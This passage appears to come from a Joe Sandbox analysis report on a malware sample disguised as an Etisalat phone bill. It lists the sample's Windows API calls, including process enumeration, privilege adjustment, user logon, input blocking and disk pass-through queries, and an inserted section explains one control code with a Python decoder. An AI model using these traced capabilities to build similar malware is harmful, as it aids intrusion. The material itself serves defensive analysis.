                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                      • API String ID: 2574300362-1816364905
                                      • Opcode ID: 2d77f7a8eb73522b327ab46a7560975c0f6e55fa04550964865ee61a1c6851c5
                                      • Instruction ID: 828c521258703fa3293ce2f9d842b74b1b3703ee50ebc0c600c0e031a7c06b11
                                      • Opcode Fuzzy Hash: 2d77f7a8eb73522b327ab46a7560975c0f6e55fa04550964865ee61a1c6851c5
                                      • Instruction Fuzzy Hash: 51E08C70200B03CFCB204F25D844A96BAD4EF09324B80C4BAE886D7220EB70D880CA60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __itow__swprintf
                                      • String ID:
                                      • API String ID: 674341424-0
                                      • Opcode ID: c03bb8eadf98e722d811ce3d51efd2e5f813ff0b4a2335f1a5de5cd582820ca2
                                      • Instruction ID: 302e0df98f6b10684b5f98110de4b407fc62bf5b31826ac2a2fdc6aece15f164
                                      • Opcode Fuzzy Hash: c03bb8eadf98e722d811ce3d51efd2e5f813ff0b4a2335f1a5de5cd582820ca2
                                      • Instruction Fuzzy Hash: 0A228A7160C3019FC724DF24C891B6AB7E4EF85700F1489ADF9AA97291DB75EA04CB92
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00BDF151
                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00BDF15F
                                        • Part of subcall function 00B67F41: _memmove.LIBCMT ref: 00B67F82
                                      • Process32NextW.KERNEL32(00000000,?), ref: 00BDF21F
                                      • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00BDF22E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                      • String ID:
                                      • API String ID: 2576544623-0
                                      • Opcode ID: 6c68059d4c9435cdb120dc5d5283c259d931d862fa7fb492a0696305407a1b88
                                      • Instruction ID: d426740773610ce1322f69351ed9e4dc6cdcf3ca58e91f8e54e01f803912a20e
                                      • Opcode Fuzzy Hash: 6c68059d4c9435cdb120dc5d5283c259d931d862fa7fb492a0696305407a1b88
                                      • Instruction Fuzzy Hash: B3517F71508301AFD320EF24DC85E6BBBE8FF98710F14496DF59697291EB74A908CB92
                                      APIs
                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC40D1
                                      • _memset.LIBCMT ref: 00BC40F2
                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00BC4144
                                      • CloseHandle.KERNEL32(00000000), ref: 00BC414D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                      • String ID:
                                      • API String ID: 1157408455-0
                                      • Opcode ID: 32ef0cb3613e17c736a7a1ce5717e8c08d7785bdaaf26a92435c401c3e655b3e
                                      • Instruction ID: a57b4c205e030b9321dc981061e600894ae21f7f2a1064065f652d6dcb24904e
                                      • Opcode Fuzzy Hash: 32ef0cb3613e17c736a7a1ce5717e8c08d7785bdaaf26a92435c401c3e655b3e
                                      • Instruction Fuzzy Hash: 361198759412287AD7305BA59C8DFABBBBCEB44760F1041DAF908E7190D6744F808BA5
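The DeviceIoControl call recorded above is worth decoding rather than eyeballing: the handle comes from CreateFileW with desired access C0000000 (GENERIC_READ|GENERIC_WRITE), share mode 3, OPEN_EXISTING (3) and FILE_ATTRIBUTE_NORMAL (80), and the control code 0004D02C is passed 0x200-byte input and output buffers. Under the CTL_CODE bit layout from winioctl.h, 0x4D02C is device type 4 (FILE_DEVICE_CONTROLLER, which ntddscsi.h uses as IOCTL_SCSI_BASE), function 0x40B, METHOD_BUFFERED, read+write access, i.e. IOCTL_ATA_PASS_THROUGH. A 512-byte output buffer is the size of an ATA IDENTIFY DEVICE block, which is the usual way a drive's model and serial number are read; the report does not show what this sample does with the result, so that last part is an inference. The Python below is an added example, not report output: it packs and unpacks control codes and names the pass-through IOCTLs defined on the same base.

```python
# Bit layout of a Windows I/O control code, as produced by the CTL_CODE macro
# in winioctl.h: bits 31..16 device type, 15..14 required access,
# 13..2 function number, 1..0 transfer method.
METHODS = {
    0: "METHOD_BUFFERED",
    1: "METHOD_IN_DIRECT",
    2: "METHOD_OUT_DIRECT",
    3: "METHOD_NEITHER",
}
ACCESS = {
    0: "FILE_ANY_ACCESS",
    1: "FILE_READ_ACCESS",
    2: "FILE_WRITE_ACCESS",
    3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS",
}
# Subset of device types; 4 is FILE_DEVICE_CONTROLLER, which ntddscsi.h
# uses as IOCTL_SCSI_BASE for the SCSI, IDE and ATA pass-through codes.
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER",
    0x07: "FILE_DEVICE_DISK",
    0x2D: "FILE_DEVICE_MASS_STORAGE",
}
# Pass-through codes on IOCTL_SCSI_BASE (function numbers from ntddscsi.h).
KNOWN_CODES = {
    0x0004D004: "IOCTL_SCSI_PASS_THROUGH",         # function 0x0401
    0x0004D014: "IOCTL_SCSI_PASS_THROUGH_DIRECT",  # function 0x0405
    0x0004D028: "IOCTL_IDE_PASS_THROUGH",          # function 0x040A
    0x0004D02C: "IOCTL_ATA_PASS_THROUGH",          # function 0x040B
    0x0004D030: "IOCTL_ATA_PASS_THROUGH_DIRECT",   # function 0x040C
}


def ctl_code(device_type, function, method, access):
    """Reproduce CTL_CODE(DeviceType, Function, Method, Access)."""
    if not (0 <= function < 0x1000 and 0 <= method < 4 and 0 <= access < 4):
        raise ValueError("field out of range for CTL_CODE")
    return (device_type << 16) | (access << 14) | (function << 2) | method


def decode_ioctl(code):
    """Split a control code into its four fields and name it when known."""
    device_type = code >> 16
    return {
        "device_type": device_type,
        "device_name": DEVICE_TYPES.get(device_type, "unknown"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
        "name": KNOWN_CODES.get(code, "unknown"),
    }


def describe_device_io_control(code, in_size, out_size):
    """One-line summary of a DeviceIoControl call as it appears in the report."""
    d = decode_ioctl(code)
    return (f"{d['name']} ({code:#010x}): {d['device_name']} fn={d['function']:#x} "
            f"{d['method']} {d['access']} in={in_size:#x} out={out_size:#x}")


if __name__ == "__main__":
    # The call recorded above: DeviceIoControl(h, 0004D02C, in, 00000200, out, 00000200, ...)
    print(describe_device_io_control(0x0004D02C, 0x200, 0x200))
```

Extend `KNOWN_CODES` with whatever IOCTL bases the sample under analysis touches; the decoder itself is generic, and the device type and function number alone usually narrow an unknown code to one header.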
                                      APIs
                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BBEB19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      APIs
                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00BD26D5
                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BD270C
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00BCB5AE
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BCB608
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BCB655
                                      APIs
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BB8D0D
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BB8D3A
                                      • GetLastError.KERNEL32 ref: 00BB8D47
                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00BC4C2C
                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BC4C43
                                      • FreeSid.ADVAPI32(?), ref: 00BC4C53
                                      APIs
                                      • FindFirstFileW.KERNEL32(?,?), ref: 00BCC966
                                      • FindClose.KERNEL32(00000000), ref: 00BCC996
                                      APIs
                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BD977D,?,00BEFB84,?), ref: 00BCA302
                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BD977D,?,00BEFB84,?), ref: 00BCA314
                                      APIs
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BB8851), ref: 00BB8728
                                      • CloseHandle.KERNEL32(?,?,00BB8851), ref: 00BB873A
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00B88F97,?,?,?,00000001), ref: 00B8A39A
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B8A3A3
                                      APIs
                                      • __time64.LIBCMT ref: 00BC8B25
                                        • Part of subcall function 00B8543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00BC91F8,00000000,?,?,?,?,00BC93A9,00000000,?), ref: 00B85443
                                        • Part of subcall function 00B8543A: __aulldiv.LIBCMT ref: 00B85463
                                      APIs
                                      • BlockInput.USER32(00000001), ref: 00BD4218
                                      APIs
                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00BC4F18
                                      APIs
                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00BB88D1), ref: 00BB8CB3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: LogonUser
                                      • String ID:
                                      • API String ID: 1244722697-0
                                      • Opcode ID: f4ab297e23130f78a4f317fdd7ead037a64d1796e82258d40cc10c4047c801db
                                      • Instruction ID: e46cb3e58624a859bcdcc341fc384184d10d9768363bb105cf7f47cc6069acd0
                                      • Opcode Fuzzy Hash: f4ab297e23130f78a4f317fdd7ead037a64d1796e82258d40cc10c4047c801db
                                      • Instruction Fuzzy Hash: AED05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C60A1C775D835AB60
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 00BA2242
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: 219f2e8691868985cc3769476cf8dfc478fa22c44a9b51c823ed9ccf3be7d287
                                      • Instruction ID: 0fd999a37821b40744be130ba4b05c178508aa2a6ce8c0cff2a57f46ca09a8cc
                                      • Opcode Fuzzy Hash: 219f2e8691868985cc3769476cf8dfc478fa22c44a9b51c823ed9ccf3be7d287
                                      • Instruction Fuzzy Hash: 39C048F180510ADBDB45EFA0DAC8DFEB7BCAB08304F2045A6A102F2141EB749B448A71
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B8A36A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 77b8098f4260e8a36550b0b2cc9acafd6a9bb812cf387e8317716c550a2fc3c8
                                      • Instruction ID: 03b239acd5e0185db9a0e5037b11fe9dee29eee1f7067cc20c9dc297aacb2581
                                      • Opcode Fuzzy Hash: 77b8098f4260e8a36550b0b2cc9acafd6a9bb812cf387e8317716c550a2fc3c8
                                      • Instruction Fuzzy Hash: 52A0243000010DF7CF001F41FC044547F5CD7001D07004030F40C45031CF33541045C4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e670e6e6ee8fc976ae1001050a09f52db38a6a6d082a9e05627b9e350a24afff
                                      • Instruction ID: 27d569ffad13dd7249068987bcb4f0e070c26af95cf34dcb7a18c3bd14024bc3
                                      • Opcode Fuzzy Hash: e670e6e6ee8fc976ae1001050a09f52db38a6a6d082a9e05627b9e350a24afff
                                      • Instruction Fuzzy Hash: B1221770A45615CBDF398B28C5D87BD77E1EB01300F68C4EAD86A9B2D1DB709D81CB62
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction ID: 52ae1d948c3d1533c3f9e1e9306df5e092763b6f0ab5cb7d25f294b418e3dadb
                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                      • Instruction Fuzzy Hash: A5C183362060630ADF1D573D947403EBAE59EA27B131A0BDDE4B2CB5E4EF24D525D720
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction ID: 95a8a2d901b229d62dd9d71ca979631f70ccddf39e96165cae92737b3e23e920
                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                      • Instruction Fuzzy Hash: 42C171322061A309DF6D573D847403EBAE19EA27B131A0BEDE4B2DB5E4EF24D525D720
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction ID: 107139c5ae4b49e092656fc82889df30d5e5e32b80fd7987ebc47cb640ed7324
                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                      • Instruction Fuzzy Hash: 50C1933220616309DB2D563D943413EBAE9DAA27B131A0FEDE4B3CB5E4EF14D526D720
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction ID: a9a117f34dda11cdd9eb2fa9fd5bab97942721e772ebdb8abfe40236103211ff
                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                      • Instruction Fuzzy Hash: EB41C2B1D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB40
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction ID: 132e2f194dfa926e0354eb8154aac1542c72e65acade60f2b02be4cb02965af2
                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                      • Instruction Fuzzy Hash: D9019278E00109EFCB88DF98C5949AEF7F5FB88310F60859AD809AB701D730AE41DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction ID: 38c88639f0157718ab666dc437a12cb3c2bcb8a14c3479aea4985ace0515282f
                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                      • Instruction Fuzzy Hash: B3014278E05109EFCB88DF98C5949AEF7F5FB48310F60859AD919AB741E730AE41DB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977906262.00000000015E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_15e0000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00BEF910), ref: 00BE38AF
                                      • IsWindowVisible.USER32(?), ref: 00BE38D3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: d38230f00e11ce47be9bd68a9778c7943fee76170d1e3491e997a6adcbea1758
                                      • Instruction ID: 18091592eb92f6a03d8d6af35caf1aa8e9cf11ed8e430fc6b83f163a8c9c0150
                                      • Opcode Fuzzy Hash: d38230f00e11ce47be9bd68a9778c7943fee76170d1e3491e997a6adcbea1758
                                      • Instruction Fuzzy Hash: ACD172302043469BCB14FF11C495AAEB7E6EF95744F1484E8F8865B3A2CB35EE4ACB41
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 00BEA89F
                                      • GetSysColorBrush.USER32(0000000F), ref: 00BEA8D0
                                      • GetSysColor.USER32(0000000F), ref: 00BEA8DC
                                      • SetBkColor.GDI32(?,000000FF), ref: 00BEA8F6
                                      • SelectObject.GDI32(?,?), ref: 00BEA905
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00BEA930
                                      • GetSysColor.USER32(00000010), ref: 00BEA938
                                      • CreateSolidBrush.GDI32(00000000), ref: 00BEA93F
                                      • FrameRect.USER32(?,?,00000000), ref: 00BEA94E
                                      • DeleteObject.GDI32(00000000), ref: 00BEA955
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00BEA9A0
                                      • FillRect.USER32(?,?,?), ref: 00BEA9D2
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00BEA9FD
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(00000012), ref: 00BEAB99
                                        • Part of subcall function 00BEAB60: SetTextColor.GDI32(?,?), ref: 00BEAB9D
                                        • Part of subcall function 00BEAB60: GetSysColorBrush.USER32(0000000F), ref: 00BEABB3
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(0000000F), ref: 00BEABBE
                                        • Part of subcall function 00BEAB60: GetSysColor.USER32(00000011), ref: 00BEABDB
                                        • Part of subcall function 00BEAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00BEABE9
                                        • Part of subcall function 00BEAB60: SelectObject.GDI32(?,00000000), ref: 00BEABFA
                                        • Part of subcall function 00BEAB60: SetBkColor.GDI32(?,00000000), ref: 00BEAC03
                                        • Part of subcall function 00BEAB60: SelectObject.GDI32(?,?), ref: 00BEAC10
                                        • Part of subcall function 00BEAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00BEAC2F
                                        • Part of subcall function 00BEAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00BEAC46
                                        • Part of subcall function 00BEAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00BEAC5B
                                      Memory Dump Source
